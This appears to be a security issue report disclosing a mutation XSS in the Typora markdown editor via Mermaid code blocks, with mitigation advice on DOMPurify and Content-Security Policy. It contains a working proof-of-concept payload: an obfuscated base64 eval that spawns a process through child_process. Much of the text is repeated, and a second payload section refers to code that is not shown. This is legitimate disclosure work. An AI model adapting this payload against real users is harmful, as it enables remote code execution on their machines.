A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same.
Steps to reproduce / PoC
Create an .md with the following contents:
```mermaid
graph TD
z --> q{<svg></p><style><g title=<svg>
"</style><img src onerror=eval(atob('dHJ5e3ZhciByPXJlcW5vZGUoJ2NoaWxkX3Byb2Nlc3MnKTtyLmV4ZWNGaWxlKCcvdXNyL2Jpbi9nbm9tZS1jYWxjdWxhdG9yJyl8fHIuZXhlY0ZpbGUoJ2NhbGMuZXhlJyl9Y2F0Y2h7d2luZG93LmJyaWRnZS5jYWxsSGFuZGxlcignd2luZG93Lm9wZW4nLCAnZmlsZTovLy9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3InKX07'))>">}
```
It's perhaps best to upgrade DOMPurify to the latest version which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old (1.0.4).
Consider employing Content-Security Policy for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered.
Notes
Versions known to be vulnerable and tested are 0.9.81, 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and MacOS respectively). I did not test the Windows version of the app.
Summary
A mXSS in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels) however other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same.
Steps to reproduce / PoC
The payload is simply HTML-entity-encoded
where the JS is simply:
Fix
It's perhaps best to upgrade DOMPurify to the latest version which seems to address new mutation XSS vectors. It looks like the version that's shipped with Typora is somewhat old (1.0.4).
Consider employing Content-Security Policy for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered.
Notes
Versions known to be vulnerable and tested are 0.9.81, 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and MacOS respectively). I did not test the Windows version of the app.
CVSS 8.3
My take is CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
// Mark Art at Havoc Research
The text was updated successfully, but these errors were encountered: